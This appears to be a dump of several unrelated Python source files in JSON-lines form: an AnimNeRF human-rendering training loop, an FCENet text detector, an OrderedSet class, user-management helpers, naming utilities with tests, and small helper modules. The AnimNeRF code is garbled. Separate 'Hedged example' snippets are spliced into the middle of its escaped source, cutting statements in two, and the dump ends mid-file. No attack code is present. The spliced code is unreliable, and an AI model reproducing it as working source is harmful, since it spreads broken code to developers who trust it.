\"{:0>6}.pkl\".format(frame_id)))\n for 
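# --- Hedged example -------------------------------------------------------
# A tiny standalone sketch of the per-frame latent code idea used by
# AnimNeRFSystem above: one learnable vector per training frame, stored in
# an nn.Embedding, initialized with small Gaussian noise, and looked up by
# frame index at train time. The sizes below are hypothetical.
import torch
import torch.nn as nn

num_frames, latent_dim = 8, 16
latent_codes = nn.Embedding(num_frames, latent_dim)
latent_codes.weight.data.normal_(0, 0.1)

frame_idx = torch.tensor([0, 3, 7])   # frame indices in a batch
codes = latent_codes(frame_idx)       # (3, latent_dim), trained jointly via autograd
print(codes.shape)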
param_name in body_model_params.keys():\n body_model_params[param_name].append(torch.from_numpy(params[param_name]).float().unsqueeze(0))\n for param_name in body_model_params.keys():\n body_model_params[param_name] = torch.cat(body_model_params[param_name], dim=0)\n self.body_model_params.init_parameters(param_name, body_model_params[param_name], requires_grad=False) \n\n @torch.no_grad()\n def decode_batch(self, batch):\n frame_id = batch['frame_id']\n cam_id = batch['cam_id']\n frame_idx = batch['frame_idx']\n rays = batch['rays'] # (bs, n_rays, 8)\n rgbs = batch['rgbs'] # (bs, n_rays, 3)\n alphas = batch['alphas'] # (bs, n_rays, 1)\n body_model_params = {\n 'betas': batch['betas'],\n 'global_orient': batch['global_orient'],\n 'body_pose': batch['body_pose'],\n 'transl': batch['transl']\n }\n body_model_params_template = {\n 'betas': batch['betas_template'],\n 'global_orient': batch['global_orient_template'],\n 'body_pose': batch['body_pose_template'],\n 'transl': batch['transl_template']\n }\n fg_points = batch['fg_points'] # (bs, num_points, 3)\n bg_points = batch['bg_points'] # (bs, num_points, 3)\n \n return frame_id, cam_id, frame_idx, rays, rgbs, alphas, body_model_params, body_model_params_template, fg_points, bg_points\n\n def forward(self, rays, body_model_params, body_model_params_template, latent_code=None, perturb=1.0):\n bs, n_rays = rays.shape[:2]\n results = defaultdict(list)\n chunk = self.hparams.chunk\n\n self.anim_nerf.set_body_model(body_model_params, body_model_params_template)\n rays = self.anim_nerf.convert_to_body_model_space(rays)\n self.anim_nerf.clac_ober2cano_transform()\n\n if latent_code is not None:\n self.anim_nerf.set_latent_code(latent_code)\n\n for i in range(0, n_rays, chunk):\n rays_chunk = rays[:, i:i+chunk, :]\n rendered_ray_chunks = self.volume_renderer(self.anim_nerf, rays_chunk, perturb=perturb)\n \n for k, v in rendered_ray_chunks.items():\n results[k] += [v]\n \n for k, v in results.items():\n results[k] = torch.cat(v, 1)\n\n return results\n\n def configure_optimizers(self):\n parameters = [ {'params': self.anim_nerf.parameters(), 'lr': self.hparams.train.lr}]\n if self.hparams.deformation_dim > 0 or self.hparams.apperance_dim > 0:\n parameters.append({'params': self.latent_codes.parameters(), 'lr': self.hparams.train.lr})\n if self.hparams.optim_body_params:\n parameters.append({'params': self.body_model_params.parameters(), 'lr': self.hparams.train.lr*0.5})\n self.optimizer = get_optimizer(self.hparams.train, parameters)\n self.scheduler = get_scheduler(self.hparams.train, self.optimizer)\n \n return [self.optimizer], [self.scheduler]\n \n def compute_loss(self, rgbs, alphas, results, frame_idx=None, latent_code=None, fg_points=None, bg_points=None):\n loss = 0\n loss_details = {}\n\n # rgb\n loss_rgb = F.mse_loss(results['rgbs'], rgbs, reduction='mean')\n loss += loss_rgb\n loss_details['loss_rgb'] = loss_rgb\n \n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n loss_rgb_fine = F.mse_loss(results['rgbs_fine'], rgbs, reduction='mean')\n loss += loss_rgb_fine\n loss_details['loss_rgb_fine'] = loss_rgb_fine\n\n # alphas\n loss_alphas = F.l1_loss(results['alphas'], alphas)\n loss += self.hparams.train.lambda_alphas * loss_alphas\n loss_details['loss_alphas'] = loss_alphas\n\n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n loss_alphas_fine = F.l1_loss(results['alphas_fine'], alphas)\n loss += self.hparams.train.lambda_alphas * loss_alphas_fine\n loss_details['loss_alphas_fine'] = loss_alphas_fine\n\n\n # 
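# --- Hedged example -------------------------------------------------------
# A stripped-down sketch of the chunked rendering loop in forward() above:
# process rays in fixed-size chunks to bound memory, collect per-chunk
# outputs in a defaultdict, and concatenate along the ray dimension at the
# end. The fake renderer below is a stand-in for the volume renderer.
from collections import defaultdict

import torch


def fake_render(rays_chunk):
    # stand-in producing per-ray rgb and depth
    bs, n = rays_chunk.shape[:2]
    return {"rgbs": torch.zeros(bs, n, 3), "depths": torch.zeros(bs, n)}


def render_in_chunks(rays, chunk=1024):
    bs, n_rays = rays.shape[:2]
    results = defaultdict(list)
    for i in range(0, n_rays, chunk):
        out = fake_render(rays[:, i:i + chunk, :])
        for k, v in out.items():
            results[k].append(v)
    return {k: torch.cat(v, dim=1) for k, v in results.items()}


if __name__ == "__main__":
    rendered = render_in_chunks(torch.zeros(1, 5000, 8), chunk=1024)
    print({k: tuple(v.shape) for k, v in rendered.items()})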
if latent_code is not None:\n # loss_latent = torch.mean(torch.pow(latent_code, 2))\n # loss += self.hparams.lambda_latent * loss_latent\n # loss_details['loss_latent'] = loss_latent\n \n # frame_idx_ = torch.clamp(frame_idx+1, 0, self.hparams.num_frames)\n # latent_code_ = self.latent_codes(frame_idx_)\n # loss_latent_smooth = F.mse_loss(latent_code, latent_code_)\n # loss += self.hparams.lambda_latent_smooth * loss_latent_smooth\n # loss_details['loss_latent_smooth'] = loss_latent_smooth\n \n if self.hparams.use_unpose and fg_points is not None:\n fg_points_sigma = self.anim_nerf.query_canonical_space(fg_points, use_fine=False, only_sigma=True)\n loss_foreground = torch.mean(torch.exp(-2.0/self.hparams.n_samples * torch.relu(fg_points_sigma)))\n loss += self.hparams.train.lambda_foreground * loss_foreground\n loss_details['loss_foreground'] = loss_foreground\n\n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n fg_points_sigma_fine = self.anim_nerf.query_canonical_space(fg_points, use_fine=True, only_sigma=True)\n loss_foreground_fine = torch.mean(torch.exp(-2.0/self.hparams.n_samples * torch.relu(fg_points_sigma_fine)))\n loss += self.hparams.train.lambda_foreground * loss_foreground_fine\n loss_details['loss_foreground_fine'] = loss_foreground_fine\n \n if self.hparams.use_unpose and bg_points is not None:\n bg_points_sigma = self.anim_nerf.query_canonical_space(bg_points, use_fine=False, only_sigma=True)\n loss_background = torch.mean(1 - torch.exp(-2.0/self.hparams.n_samples * torch.relu(bg_points_sigma)))\n loss += self.hparams.train.lambda_background * loss_background\n loss_details['loss_background'] = loss_background\n\n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n bg_points_sigma_fine = self.anim_nerf.query_canonical_space(bg_points, use_fine=True, only_sigma=True)\n loss_background_fine = torch.mean(1 - torch.exp(-2.0/self.hparams.n_samples * torch.relu(bg_points_sigma_fine)))\n loss += self.hparams.train.lambda_background * loss_background_fine\n loss_details['loss_background_fine'] = loss_background_fine\n\n # normal\n points = self.anim_nerf.verts_template.detach()\n points += torch.randn_like(points) * self.hparams.dis_threshold * 0.5\n points_neighbs = points + torch.randn_like(points) * self.hparams.train.epsilon\n points_normal = self.anim_nerf.query_canonical_space(points, use_fine=False, only_normal=True)\n points_neighbs_normal = self.anim_nerf.query_canonical_space(points_neighbs, use_fine=False, only_normal=True)\n points_normal = points_normal / (torch.norm(points_normal, p=2, dim=-1, keepdim=True) + 1e-5)\n points_neighbs_normal = points_neighbs_normal / (torch.norm(points_neighbs_normal, p=2, dim=-1, keepdim=True) + 1e-5)\n loss_normals = F.mse_loss(points_normal, points_neighbs_normal)\n # loss_normals = torch.mean((torch.norm(points_normal, p=2, dim=-1) - 1)**2)\n loss += self.hparams.train.lambda_normals * loss_normals\n loss_details['loss_normals'] = loss_normals\n\n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n points_normal_fine = self.anim_nerf.query_canonical_space(points, use_fine=True, only_normal=True)\n points_neighbs_normal_fine = self.anim_nerf.query_canonical_space(points_neighbs, use_fine=True, only_normal=True)\n points_normal_fine = points_normal_fine / (torch.norm(points_normal_fine, p=2, dim=-1, keepdim=True) + 1e-5)\n points_neighbs_normal_fine = points_neighbs_normal_fine / (torch.norm(points_neighbs_normal_fine, p=2, dim=-1, keepdim=True) + 1e-5)\n loss_normals_fine = 
F.mse_loss(points_normal_fine, points_neighbs_normal_fine)\n # loss_normals_fine = torch.mean((torch.norm(points_normal_fine, p=2, dim=-1) - 1)**2)\n loss += self.hparams.train.lambda_normals * loss_normals_fine\n loss_details['loss_normals_fine'] = loss_normals_fine\n\n # if body_model_params is not None:\n # loss_pose = F.mse_loss(results['joints'].clone(), self.anim_nerf.model(**body_model_params)['joints'].clone())\n # loss += self.hparams.lambda_pose * loss_pose\n # loss_details['loss_pose'] = loss_pose\n\n # frame_id_ = torch.clamp(frame_id+1, 0, self.body_model_params.num_frame-1)\n # body_model_params_ref_ = self.body_model_params(frame_id_)\n # loss_pose_smooth = F.mse_loss(self.anim_nerf.joints, self.anim_nerf.model(**body_model_params_ref_)['joints'])\n # loss += self.hparams.lambda_pose_smooth * loss_pose_smooth\n # loss_details['loss_pose_smooth'] = loss_pose_smooth\n\n return loss, loss_details\n\n def training_step(self, batch, batch_nb):\n frame_id, cam_id, frame_idx, rays, rgbs, alphas, body_model_params, body_model_params_template, fg_points, bg_points = self.decode_batch(batch)\n if self.hparams.latent_dim > 0:\n latent_code = self.latent_codes(frame_idx)\n else:\n latent_code = None\n if self.hparams.optim_body_params:\n body_model_params = self.body_model_params(frame_idx)\n results = self(rays, body_model_params, body_model_params_template, latent_code=latent_code)\n loss, loss_details = self.compute_loss(rgbs, alphas, results, frame_idx=frame_idx, fg_points=fg_points, bg_points=bg_points)\n self.log('train/loss', loss, on_step=True, on_epoch=False, prog_bar=True, logger=True)\n for loss_name in loss_details.keys():\n self.log('train/{}'.format(loss_name), loss_details[loss_name], on_step=True, on_epoch=False, prog_bar=True, logger=True)\n \n with torch.no_grad():\n if 'rgbs_fine' in results:\n train_psnr = psnr(results['rgbs_fine'], rgbs)\n else:\n train_psnr = psnr(results['rgbs'], rgbs)\n self.log('train/psnr', train_psnr, on_step=True, on_epoch=False, prog_bar=True, logger=True)\n \n lr = get_learning_rate(self.optimizer)\n self.log('lr', lr, on_step=False, on_epoch=True, prog_bar=False, logger=True)\n\n return loss\n \n\n def validation_step(self, batch, batch_nb):\n frame_id, cam_id, frame_idx, rays, rgbs, alphas, body_model_params, body_model_params_template, fg_points, bg_points = self.decode_batch(batch)\n if self.hparams.latent_dim > 0:\n if frame_idx != -1:\n latent_code = self.latent_codes(frame_idx)\n else:\n latent_code = self.latent_codes(torch.zeros_like(frame_idx))\n else:\n latent_code = None\n if self.hparams.optim_body_params and frame_idx != -1:\n body_model_params = self.body_model_params(frame_idx)\n # else:\n # body_model_params['betas'] = self.body_model_params.betas(torch.zeros_like(frame_idx))\n results = self(rays, body_model_params, body_model_params_template, latent_code=latent_code)\n loss, _ = self.compute_loss(rgbs, alphas, results)\n self.log('val/loss', loss, on_step=False, on_epoch=True, prog_bar=True, logger=True)\n\n if 'rgbs_fine' in results:\n val_psnr = psnr(results['rgbs_fine'], rgbs)\n else:\n val_psnr = psnr(results['rgbs'], rgbs)\n self.log('val/psnr', val_psnr, on_step=False, on_epoch=True, prog_bar=True, logger=True)\n \n W, H = self.hparams.img_wh\n \n def visualize(frame_id, cam_id, rgbs_gt, rgbs, depths, W, H):\n img = rgbs.cpu().view(H, W, 3).permute(2, 0, 1) # (3, H, W)\n img_gt = rgbs_gt.cpu().view(H, W, 3).permute(2, 0, 1) # (3, H, W)\n depth = visualize_depth(depths.cpu().view(H, W))\n stack = torch.stack([img_gt, 
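# --- Hedged example -------------------------------------------------------
# The training/validation steps above log PSNR via torchmetrics. For
# reference, a minimal manual version under the assumption that rgb values
# are normalized to [0, 1] (so the peak signal value is 1):
#     PSNR = 10 * log10(MAX^2 / MSE) = -10 * log10(MSE)
import torch


def psnr_from_mse(pred, target):
    mse = torch.mean((pred - target) ** 2)
    return -10.0 * torch.log10(mse)


if __name__ == "__main__":
    target = torch.rand(1, 3, 8, 8)
    pred = (target + 0.01 * torch.randn_like(target)).clamp(0, 1)
    print(float(psnr_from_mse(pred, target)))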
img, depth]) # (3, 3, H, W)\n self.logger.experiment.add_images('val/GT_pred_depth_cam{:0>3d}_{:0>6d}'.format(cam_id, frame_id), stack, self.global_step)\n\n if batch_nb % self.hparams.val.vis_freq == 0:\n if 'rgbs_fine' in results:\n visualize(frame_id.item(), cam_id.item(), rgbs, results['rgbs_fine'], results['depths_fine'], W, H)\n else:\n visualize(frame_id.item(), cam_id.item(), rgbs, results['rgbs'], results['depths'], W, H)\n \n return loss\n \n def test_step(self, batch, batch_nb):\n frame_id, cam_id, frame_idx, rays, rgbs, alphas, body_model_params, body_model_params_template, fg_points, bg_points = self.decode_batch(batch)\n if self.hparams.latent_dim > 0:\n if frame_idx != -1:\n latent_code = self.latent_codes(frame_idx)\n else:\n latent_code = self.latent_codes(torch.zeros_like(frame_idx))\n else:\n latent_code = None\n if self.hparams.optim_body_params and frame_idx != -1:\n body_model_params = self.body_model_params(frame_idx)\n # else:\n # body_model_params['betas'] = self.body_model_params.betas(torch.zeros_like(frame_idx))\n results = self(rays, body_model_params, body_model_params_template, latent_code=latent_code, perturb=0.0)\n loss, _ = self.compute_loss(rgbs, alphas, results)\n self.log('test/loss', loss, on_step=False, on_epoch=True, prog_bar=True, logger=False)\n\n if 'rgbs_fine' in results:\n test_psnr = psnr(results['rgbs_fine'], rgbs)\n else:\n test_psnr = psnr(results['rgbs'], rgbs)\n self.log('test/psnr', test_psnr, on_step=False, on_epoch=True, prog_bar=True, logger=False)\n \n W, H = self.hparams.img_wh\n \n def visualize(frame_id, cam_id, rgbs_gt, rgbs, depths, W, H):\n img = rgbs.cpu().view(H, W, 3).permute(2, 0, 1) # (3, H, W)\n img_gt = rgbs_gt.cpu().view(H, W, 3).permute(2, 0, 1) # (3, H, W)\n depth = visualize_depth(depths.cpu().view(H, W))\n stack = torch.stack([img_gt, img, depth]) # (3, 3, H, W)\n os.makedirs(os.path.join(self.hparams.outputs_dir, self.hparams.exp_name, 'cam{:0>3d}'.format(cam_id)), exist_ok=True)\n save_image(stack, '{}/{}/cam{:0>3d}/{:0>6d}.png'.format(self.hparams.outputs_dir, self.hparams.exp_name, cam_id, frame_id))\n #self.logger.experiment.add_images('test/GT_pred_depth_{}'.format(nb), stack, self.global_step)\n\n if batch_nb % self.hparams.test.vis_freq == 0:\n if 'rgbs_fine' in results:\n visualize(frame_id.item(), cam_id.item(), rgbs, results['rgbs_fine'], results['depths_fine'], W, H)\n else:\n visualize(frame_id.item(), cam_id.item(), rgbs, results['rgbs'], results['depths'], W, H)\n \n return loss\n\nif __name__ == '__main__':\n # torch.autograd.set_detect_anomaly(True)\n train_start_time = time.time()\n cfg = get_cfg()\n data = AnimNeRFData(cfg)\n system = AnimNeRFSystem(cfg)\n print(system)\n\n if cfg.train.ckpt_path is not None:\n for model_name in cfg.train.model_names_to_load:\n load_ckpt(getattr(system, model_name), cfg.train.ckpt_path, model_name)\n for param in getattr(system, model_name).parameters():\n param.requires_grad = cfg.train.pretrained_model_requires_grad\n \n checkpoint_callback = ModelCheckpoint(dirpath=f'{cfg.checkpoints_dir}/{cfg.exp_name}',\n filename='{epoch:d}',\n monitor='train/psnr',\n mode='max',\n save_top_k=cfg.train.save_top_k,\n save_last=cfg.train.save_last)\n\n logger = TensorBoardLogger(\n save_dir=cfg.logs_dir,\n name=cfg.exp_name,\n )\n\n trainer = Trainer(max_epochs=cfg.train.max_epochs,\n callbacks=[checkpoint_callback],\n logger=logger,\n gpus=cfg.num_gpus,\n strategy=cfg.train.strategy,\n num_sanity_val_steps=1,\n benchmark=True,\n profiler=\"simple\")\n\n trainer.fit(system, 
data, ckpt_path=cfg.train.ckpt_path if cfg.train.resume else None)\n trainer.test(datamodule=data)\n\n train_end_message = 'End of training \\t Time Taken: %.3f hours' % ((time.time() - train_start_time)/3600.0)\n print(train_end_message)"} {"ext": "py", "sha": "1a2ed4403a4bf9c2636129169b534c8c00be1050", "content": "from mmdet.models.builder import DETECTORS\n\nfrom .single_stage_text_detector import SingleStageTextDetector\nfrom .text_detector_mixin import TextDetectorMixin\n\n\n@DETECTORS.register_module()\nclass FCENet(TextDetectorMixin, SingleStageTextDetector):\n \"\"\"The class for implementing FCENet text detector\n FCENet(CVPR2021): Fourier Contour Embedding for Arbitrary-shaped Text\n Detection\n\n [https://arxiv.org/abs/2104.10442]\n \"\"\"\n\n def __init__(self,\n backbone,\n neck,\n bbox_head,\n train_cfg=None,\n test_cfg=None,\n pretrained=None,\n show_score=False,\n init_cfg=None):\n SingleStageTextDetector.__init__(self, backbone, neck, bbox_head,\n train_cfg, test_cfg, pretrained,\n init_cfg)\n TextDetectorMixin.__init__(self, show_score)\n\n def simple_test(self, img, img_metas, rescale=False):\n x = self.extract_feat(img)\n outs = self.bbox_head(x)\n boundaries = self.bbox_head.get_boundary(outs, img_metas, rescale)\n\n return [boundaries]\n"} {"ext": "py", "sha": "1a2ed47bfc16e006146e2f741497c36729e0cf0b", "content": "from collections.abc import MutableSet, Sequence\nfrom itertools import tee\n\n\nclass OrderedSet(MutableSet, Sequence):\n def __init__(self, iterable=None):\n if iterable is None:\n iterable = []\n\n it1, it2 = tee(iterable)\n self._set = set(it1)\n self._list = []\n for i in it2:\n if i not in self._list:\n self._list.append(i)\n\n def add(self, value):\n if value not in self._set:\n self._set.add(value)\n self._list.append(value)\n\n def discard(self, value):\n if value in self._set:\n self._set.discard(value)\n self._list.remove(value)\n\n def __contains__(self, value):\n return value in self._set\n\n def __len__(self):\n return len(self._set)\n\n def __iter__(self):\n return iter(self._list)\n\n def __getitem__(self, slice_):\n return self._list[slice_]\n\n def index(self, value, start=0, stop=None):\n return self._list[start: stop].index(value)\n\n def __repr__(self):\n return 'OrderedSet(' + ','.join(repr(i) for i in self) + ')'\n"} {"ext": "py", "sha": "1a2ed50591b8fa7750fb49f6df4e5567ff91879b", "content": "#!/usr/bin/env python3\n# Copyright (c) 2004-present Facebook All rights reserved.\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file.\n\nfrom typing import List, Optional\n\nfrom pysymphony import SymphonyClient\n\nfrom ..common.constant import SUPERUSER_ROLE, USER_ROLE\nfrom ..common.data_enum import Entity\nfrom ..exceptions import EntityNotFoundError\nfrom ..graphql.enum.user_role import UserRole\nfrom ..graphql.enum.user_status import UserStatus\nfrom ..graphql.fragment.user import UserFragment\nfrom ..graphql.input.edit_user import EditUserInput\nfrom ..graphql.mutation.edit_user import EditUserMutation\nfrom ..graphql.query.user import UserQuery\nfrom ..graphql.query.users import UsersQuery\n\n\ndef get_user(client: SymphonyClient, email: str) -> UserFragment:\n \"\"\"Returns `pyinventory.graphql.fragment.user.UserFragment` object by its email\n\n Args:\n email (str): the email address the user registered with\n\n Returns:\n `pyinventory.graphql.fragment.user.UserFragment` object\n\n Raises:\n `pyinventory.exceptions.EntityNotFoundError`: the user was not found\n FailedOperationException: 
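# --- Hedged usage example -------------------------------------------------
# Quick usage sketch for the OrderedSet class defined just above (assumes
# that class is in scope): duplicates are dropped while insertion order is
# preserved, and both set-style and sequence-style access work.
s = OrderedSet([3, 1, 3, 2, 1])
print(list(s))                     # [3, 1, 2]
s.add(5)
s.discard(1)
print(s[0], s.index(2), len(s))    # 3 1 3
print(2 in s, 1 in s)              # True False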
internal inventory error\n\n Example:\n ```\n user = client.get_user(email=\"user@test.com\")\n ```\n \"\"\"\n user = UserQuery.execute(client, email)\n if user is None:\n raise EntityNotFoundError(entity=Entity.User, entity_name=email)\n return UserFragment(\n id=user.id,\n authID=user.authID,\n email=user.email,\n status=user.status,\n role=user.role,\n )\n\n\ndef add_user(client: SymphonyClient, email: str, password: str) -> UserFragment:\n \"\"\"Adds new user to inventory with its email and password\n\n Args:\n email (str): the email address of the user\n password (str): password the user would connect with\n\n Returns:\n `pyinventory.graphql.fragment.user.UserFragment` object\n\n Raises:\n `pyinventory.exceptions.EntityNotFoundError`: the user was not created properly\n FailedOperationException: internal inventory error\n AssertionError: The user was not created for some known reason\n HTTPError: Error with connection\n\n Example:\n ```\n user = client.add_user(email=\"user@test.com\", password=\"P0ssW!rd0f43\")\n ```\n \"\"\"\n resp = client.post(\n \"/user/async/\",\n {\"email\": email, \"password\": password, \"role\": USER_ROLE, \"networkIDs\": []},\n )\n\n if not resp.ok:\n error_message = resp.json().get(\"error\", None)\n if error_message is not None:\n raise AssertionError(error_message)\n raise\n\n return get_user(client=client, email=email)\n\n\ndef edit_user(\n client: SymphonyClient,\n user: UserFragment,\n new_password: Optional[str] = None,\n new_role: Optional[UserRole] = None,\n) -> None:\n \"\"\"Edit user password and role\n\n Args:\n user ( `pyinventory.graphql.fragment.user.UserFragment` ): user to edit\n new_password (Optional[str]): new password the user would connect with\n new_role ( `pyinventory.graphql.enum.user_role.UserRole` ): user new role\n\n Raises:\n FailedOperationException: internal inventory error\n AssertionError: The user was not edited for some known reason\n HTTPError: Error with connection\n\n Example:\n ```\n user = client.add_user(email=\"user@test.com\", password=\"P0ssW!rd0f43\")\n client.edit_user(user=user, new_password=\"New_Password4Ever\", new_role=UserRole.ADMIN)\n ```\n \"\"\"\n params = {}\n if new_password is not None:\n params.update({\"password\": new_password})\n if new_role is not None:\n params.update(\n {\"role\": USER_ROLE if new_role == UserRole.USER else SUPERUSER_ROLE}\n )\n resp = client.put(f\"/user/set/{user.email}\", params)\n\n if not resp.ok:\n error_message = resp.json().get(\"error\", None)\n if error_message is not None:\n raise AssertionError(error_message)\n raise\n\n if new_role is not None:\n EditUserMutation.execute(client, input=EditUserInput(id=user.id, role=new_role))\n\n\ndef deactivate_user(client: SymphonyClient, user: UserFragment) -> None:\n \"\"\"Deactivate the user which would prevent the user from login in to symphony\n Users in symphony are never deleted. 
Only de-activated.\n\n\n Args:\n user ( `pyinventory.graphql.fragment.user.UserFragment` ): user to deactivate\n\n\n Raises:\n FailedOperationException: internal inventory error\n\n Example:\n ```\n user = client.get_user(email=\"user@test.com\")\n client.deactivate_user(user=user)\n ```\n \"\"\"\n EditUserMutation.execute(\n client, input=EditUserInput(id=user.id, status=UserStatus.DEACTIVATED)\n )\n\n\ndef activate_user(client: SymphonyClient, user: UserFragment) -> None:\n \"\"\"Activate the user which would allow the user to login again to symphony\n\n Args:\n user ( `pyinventory.graphql.fragment.user.UserFragment` ): user to activate\n\n Raises:\n FailedOperationException: internal inventory error\n\n Example:\n ```\n user = client.get_user(email=\"user@test.com\")\n client.activate_user(user=user)\n ```\n \"\"\"\n EditUserMutation.execute(\n client, input=EditUserInput(id=user.id, status=UserStatus.ACTIVE)\n )\n\n\ndef get_users(client: SymphonyClient) -> List[UserFragment]:\n \"\"\"Get the list of users in the system (both active and deactivate)\n\n Returns:\n List[ `pyinventory.graphql.fragment.user.UserFragment` ]\n\n Raises:\n FailedOperationException: internal inventory error\n\n Example:\n ```\n users = client.get_users()\n for user in users:\n print(user.email)\n ```\n \"\"\"\n result = UsersQuery.execute(client)\n if result is None:\n return []\n users = []\n for edge in result.edges:\n node = edge.node\n if node is not None:\n users.append(\n UserFragment(\n id=node.id,\n authID=node.authID,\n email=node.email,\n status=node.status,\n role=node.role,\n )\n )\n return users\n\n\ndef get_active_users(client: SymphonyClient) -> List[UserFragment]:\n \"\"\"Get the list of the active users in the system\n\n Returns:\n List[ `pyinventory.graphql.fragment.user.UserFragment` ]\n\n Raises:\n FailedOperationException: internal inventory error\n\n Example:\n ```\n users = client.get_active_users()\n for user in users:\n print(user.email)\n ```\n \"\"\"\n users = get_users(client=client)\n return [user for user in users if user.status == UserStatus.ACTIVE]\n"} {"ext": "py", "sha": "1a2ed521273fc18d627e33dab6c4d4e5e9b8bead", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport string\n\nPY2 = sys.version_info[0] == 2\nPY3 = sys.version_info[0] == 3\n\nif PY3:\n string_types = str,\n integer_types = int,\nelse:\n string_types = basestring,\n integer_types = (int, long)\n\nSEP = \"____\"\nKLS_NAME_CHARSET = set(string.ascii_letters + string.digits)\nVAR_NAME_CHARSET = set(string.ascii_lowercase + string.digits + \"_\")\nVAR_FORBIDDEN_CHARSET = set(\n r\"\"\"~`!@#$%^&*()-+={}[]|\\:;\"'<,>.?/\"\"\" + string.ascii_uppercase)\nINDEX_KEY_FORBIDDEN_CHARSET = set(r\"\"\"~`!@#$%^&*()-+={}[]|\\:;\"'<,>.?/\"\"\")\nWHITE_SPACE = set(string.whitespace)\n\n\ndef is_valid_class_name(name):\n \"\"\"Check if it is a valid variable name.\n\n A valid variable name has to:\n\n - start wither upper case\n - only alpha digits\n \"\"\"\n try:\n assert name[0].isupper()\n assert len(set(name).difference(KLS_NAME_CHARSET)) == 0\n return True\n except:\n return False\n\n\ndef is_valid_variable_name(name):\n \"\"\"Check if it is a valid variable name.\n\n A valid variable name has to:\n\n - start wither lower case\n - reserved SEPTERATOR is not in it.\n \"\"\"\n try:\n assert name[0].islower()\n assert SEP not in name\n assert len(set(name).difference(VAR_NAME_CHARSET)) == 0\n return True\n except:\n return False\n\n\ndef is_valid_surfix(name):\n \"\"\"Surfix is the attribute name used 
for index.\n\n **中文文档**\n\n 此方法暂时没用。\n \"\"\"\n try:\n assert SEP not in name\n assert len(VAR_FORBIDDEN_CHARSET.intersection(name)) == 0\n return True\n except:\n return False\n\n\ndef to_variable_name(cls_name):\n \"\"\"Convert class name to variable name format. usually use \"_\" to connect\n each word.\n\n **中文文档**\n\n 将类名转化为其实例的变量名。\n \"\"\"\n assert is_valid_class_name(cls_name)\n\n words = list()\n chunks = list()\n for char in cls_name:\n if char.isupper():\n words.append(\"\".join(chunks))\n chunks = [\"_\", char.lower()]\n else:\n chunks.append(char)\n words.append(\"\".join(chunks))\n return \"\".join(words)[1:]\n\n\ndef to_index_key(value):\n \"\"\"Convert a value to it's index key in string.\n Only alpha and digits and underscore is allowed. Whitespace delimiter will\n replaced with underscore.\n\n `` *David# #John* `` -> ``David_John``\n \"\"\"\n if isinstance(value, integer_types):\n key = str(value)\n\n elif isinstance(value, string_types):\n l = list()\n for c in value:\n if c not in INDEX_KEY_FORBIDDEN_CHARSET:\n if c in WHITE_SPACE:\n l.append(\" \")\n else:\n l.append(c)\n words = [word for word in \"\".join(\n l).strip().split(\" \") if word.strip()]\n key = \"_\".join(words)\n\n elif isinstance(value, float):\n key = str(value).replace(\".\", \"d\")\n\n else:\n raise TypeError(\"%r is not an indexable value.\")\n\n return key\n\n\ndef test_is_valid_class_name():\n for name in [\"User\", \"MyClass\", \"TestCase\"]:\n assert is_valid_class_name(name) is True\n\n for name in [\"user\", \"My_Class\", \"testCase\"]:\n assert is_valid_class_name(name) is False\n\n\ndef test_is_valid_variable_name():\n for name in [\"name\", \"my_class\", \"num1\"]:\n assert is_valid_variable_name(name) is True\n\n for name in [\"Name\", \"myClass\", \"1a\"]:\n assert is_valid_variable_name(name) is False\n\n\ndef test_is_valid_surfix():\n assert is_valid_surfix(\"大卫\") is True\n\n\ndef test_to_variable_name():\n assert to_variable_name(\"User\") == \"user\"\n assert to_variable_name(\"MyClass\") == \"my_class\"\n\n\ndef test_to_index_key():\n assert to_index_key(1) == \"1\"\n assert to_index_key(\"David John\") == \"David_John\"\n assert to_index_key(\" *David+ +John* \") == \"David_John\"\n assert to_index_key(\"中文\") == \"中文\"\n assert to_index_key(\" 英 文 \") == \"英_文\"\n assert to_index_key(3.14) == \"3d14\"\n\n\nif __name__ == \"__main__\":\n test_is_valid_class_name()\n test_is_valid_variable_name()\n test_is_valid_surfix()\n test_to_variable_name()\n test_to_index_key()\n"} {"ext": "py", "sha": "1a2ed5304b47b5ddd430dfd7759ebbcc9a4f02b4", "content": "from typing import List\n\nimport dash_html_components as html\n\nfrom .. import WebvizPluginABC\n\n\nclass ExampleTour(WebvizPluginABC):\n @property\n def tour_steps(self) -> List[dict]:\n return [\n {\"id\": self.uuid(\"blue_text\"), \"content\": \"This is the first step\"},\n {\"id\": self.uuid(\"red_text\"), \"content\": \"This is the second step\"},\n ]\n\n @property\n def layout(self) -> html.Div:\n return html.Div(\n children=[\n html.Span(\n \"Here is some blue text to explain... 
\",\n id=self.uuid(\"blue_text\"),\n style={\"color\": \"blue\"},\n ),\n html.Span(\n \" ...and here is some red text that also needs an explanation.\",\n id=self.uuid(\"red_text\"),\n style={\"color\": \"red\"},\n ),\n ]\n )\n"} {"ext": "py", "sha": "1a2ed6b5572c5252fd3e6bd67d2091d5e8e96cb4", "content": "#-----------Welcome to DeAdSeC Python Codex----------#\n#-------Made By DeAdSeC-------#\n#---Version 1.0.0---#\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nW = '\\033[0m' # white (normal)\nR = '\\033[31m' # red\nG = '\\033[32m' # green\nO = '\\033[33m' # orange\nB = '\\033[34m' # blue\nP = '\\033[35m' # purple\nC = '\\033[36m' # cyan\nGR = '\\033[37m' # gray\nD = '\\033[2m' # dims current color. {W} resets.\nPlus = f'{W}{D}[{W}{G}+{W}{D}]{W}' #[+]\nDanger = f'{O}[{R}!{O}]{W}' #[!]\nWTF = f'{W}[{C}?{W}]' #[?]\n"} {"ext": "py", "sha": "1a2ed73c6938b74922ea5d4c0a29b3adcb86a5a0", "content": "import torch\n\ndef config_device():\n # determine if gpu is to be used\n return torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef update_rule(fast_lr):\n def update_q(old, new):\n return old + fast_lr * (new - old)\n return update_q"} {"ext": "py", "sha": "1a2ed8fd542eee35350c522db44f819721ca587c", "content": "import numpy as np\nfrom scipy.optimize import minimize\nfrom scipy.optimize import Bounds\n\n\n__all__ = [\n \"MAD\",\n \"SemiDeviation\",\n \"VaR_Hist\",\n 